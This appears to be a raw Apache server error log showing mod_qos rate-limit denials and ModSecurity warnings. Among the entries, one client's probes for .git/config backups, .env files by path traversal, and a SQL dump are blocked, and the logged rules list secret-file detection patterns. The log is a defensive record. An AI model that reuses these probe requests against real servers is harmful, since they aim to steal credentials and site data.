[Tue May 26 19:54:09.641060 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2mwAAAMs
[Tue May 26 19:54:09.643849 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2nAAAAIw
[Tue May 26 19:54:09.645516 2026] [qos:error] [pid 93868:tid 94383] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtCUqK9k_ZUB2Vp25G4gAAAgw
[Tue May 26 19:54:09.718265 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2nwAAANk
[Tue May 26 19:54:09.718423 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2ngAAALU
[Tue May 26 19:54:09.719971 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCVZMwN0DpLVWo6K2oAAAAJ0
[Tue May 26 19:54:10.021296 2026] [security2:error] [pid 86490:tid 86644] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config~"] [unique_id "ahWtClZMwN0DpLVWo6K2qwAAAJ0"]
[Tue May 26 19:54:10.182151 2026] [security2:error] [pid 86490:tid 86696] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env"] [unique_id "ahWtClZMwN0DpLVWo6K2rQAAANE"]
[Tue May 26 19:54:10.286616 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNqAAAAGQ"]
[Tue May 26 19:54:10.288867 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNogAAAC4"]
[Tue May 26 19:54:10.290609 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K18wAAAQM"]
[Tue May 26 19:54:10.296308 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GywAAAak"]
[Tue May 26 19:54:10.302915 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K19gAAALA"]
[Tue May 26 19:54:10.306954 2026] [security2:error] [pid 86490:tid 86671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K18AAAALg"]
[Tue May 26 19:54:10.326187 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K2BAAAAMc"]
[Tue May 26 19:54:10.332794 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GzQAAAe0"]
[Tue May 26 19:54:10.334560 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GzwAAAbM"]
[Tue May 26 19:54:10.335904 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K2AQAAALo"]
[Tue May 26 19:54:10.338407 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCGDRMqfxdEDkoszNpgAAADk"]
[Tue May 26 19:54:10.340751 2026] [security2:error] [pid 86490:tid 86722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K19wAAAOs"]
[Tue May 26 19:54:10.343399 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K2CAAAAPo"]
[Tue May 26 19:54:10.347361 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K2DwAAAIY"]
[Tue May 26 19:54:10.351027 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K2AwAAAOU"]
[Tue May 26 19:54:10.354196 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K1-gAAAMU"]
[Tue May 26 19:54:10.355924 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNyAAAAFY"]
[Tue May 26 19:54:10.358891 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCEqK9k_ZUB2Vp25GzAAAAbo"]
[Tue May 26 19:54:10.362495 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNxAAAADo"]
[Tue May 26 19:54:10.378750 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNwwAAAGk"]
[Tue May 26 19:54:10.387967 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNxgAAAG4"]
[Tue May 26 19:54:10.388981 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNzAAAAH4"]
[Tue May 26 19:54:10.411326 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNxwAAAGs"]
[Tue May 26 19:54:10.411882 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNxQAAAAg"]
[Tue May 26 19:54:10.441179 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2bQAAAJI"]
[Tue May 26 19:54:10.441745 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2egAAAIs"]
[Tue May 26 19:54:10.442541 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCWDRMqfxdEDkoszNygAAABo"]
[Tue May 26 19:54:10.450730 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2ZgAAAMY"]
[Tue May 26 19:54:10.450735 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2XQAAAOg"]
[Tue May 26 19:54:10.667825 2026] [security2:error] [pid 86490:tid 86737] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/icon/.env"] [unique_id "ahWtClZMwN0DpLVWo6K2xAAAAPo"]
[Tue May 26 19:54:10.817506 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtCmDRMqfxdEDkoszN-AAAAC0
[Tue May 26 19:54:10.817762 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K25wAAANI
[Tue May 26 19:54:10.818378 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K26AAAAJI
[Tue May 26 19:54:10.819398 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtCmDRMqfxdEDkoszN_AAAABg
[Tue May 26 19:54:10.821571 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtClZMwN0DpLVWo6K26gAAAIs
[Tue May 26 19:54:10.821705 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtCmDRMqfxdEDkoszN_wAAAGY
[Tue May 26 19:54:10.821855 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtClZMwN0DpLVWo6K26wAAAMk
[Tue May 26 19:54:10.824827 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtClZMwN0DpLVWo6K27QAAAJY
[Tue May 26 19:54:10.825175 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtClZMwN0DpLVWo6K27gAAAMY
[Tue May 26 19:54:10.829020 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtClZMwN0DpLVWo6K28wAAAIc
[Tue May 26 19:54:10.969570 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K29wAAALc
[Tue May 26 19:54:10.969996 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K29gAAAPA
[Tue May 26 19:54:10.970439 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCmDRMqfxdEDkoszOAwAAAAI
[Tue May 26 19:54:10.970602 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCmDRMqfxdEDkoszOBAAAAEw
[Tue May 26 19:54:10.972447 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K2-AAAAPg
[Tue May 26 19:54:10.972839 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtCmDRMqfxdEDkoszOBQAAAGE
[Tue May 26 19:54:10.973397 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K2-QAAAJI
[Tue May 26 19:54:10.973542 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K2-gAAALE
[Tue May 26 19:54:10.974808 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K2_AAAAIs
[Tue May 26 19:54:10.978696 2026] [qos:error] [pid 86490:tid 86688] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtClZMwN0DpLVWo6K2_QAAAMk
[Tue May 26 19:54:11.118544 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOBgAAABc
[Tue May 26 19:54:11.119486 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K2_wAAAJw
[Tue May 26 19:54:11.120566 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOBwAAAFE
[Tue May 26 19:54:11.121241 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOCAAAAEU
[Tue May 26 19:54:11.121988 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3AAAAALU
[Tue May 26 19:54:11.122015 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3AQAAANk
[Tue May 26 19:54:11.123057 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3AgAAAJY
[Tue May 26 19:54:11.124115 2026] [qos:error] [pid 86490:tid 86718] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3AwAAAOc
[Tue May 26 19:54:11.126837 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3BAAAAMY
[Tue May 26 19:54:11.130268 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3BQAAAO8
[Tue May 26 19:54:11.151949 2026] [security2:error] [pid 86490:tid 86708] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/dump.sql"] [unique_id "ahWtC1ZMwN0DpLVWo6K3BgAAAN0"]
[Tue May 26 19:54:11.266681 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOCQAAAHQ
[Tue May 26 19:54:11.269658 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOCgAAADY
[Tue May 26 19:54:11.269690 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtC2DRMqfxdEDkoszOCwAAACg
[Tue May 26 19:54:11.271350 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3CAAAAME
[Tue May 26 19:54:11.271418 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3BwAAAIw
[Tue May 26 19:54:11.272224 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3CQAAALc
[Tue May 26 19:54:11.276288 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3CgAAAMs
[Tue May 26 19:54:11.277856 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3CwAAAPA
[Tue May 26 19:54:11.279886 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3DAAAAMs
[Tue May 26 19:54:11.288217 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtC1ZMwN0DpLVWo6K3DQAAANI
[Tue May 26 19:54:11.288552 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2YwAAAPM"]
[Tue May 26 19:54:11.290982 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2bgAAAP0"]
[Tue May 26 19:54:11.291715 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCUqK9k_ZUB2Vp25G1gAAAZ8"]
[Tue May 26 19:54:11.298042 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2eQAAAJM"]
[Tue May 26 19:54:11.298214 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCFZMwN0DpLVWo6K2DQAAAM8"]
[Tue May 26 19:54:11.302566 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCVZMwN0DpLVWo6K2ZwAAAJE"]
[Tue May 26 19:54:11.313753 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtCUqK9k_ZUB2Vp25G3gAAAcI"]
